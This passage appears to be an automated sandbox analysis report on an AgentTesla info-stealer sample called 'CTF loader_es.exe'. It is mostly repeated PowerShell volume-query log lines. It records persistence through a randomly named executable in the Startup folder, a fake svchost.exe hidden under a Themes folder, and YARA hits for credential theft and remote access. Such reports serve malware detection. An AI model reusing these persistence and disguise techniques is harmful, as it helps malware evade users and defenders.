Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeQueries volume information: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505

Remote Access Functionality:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
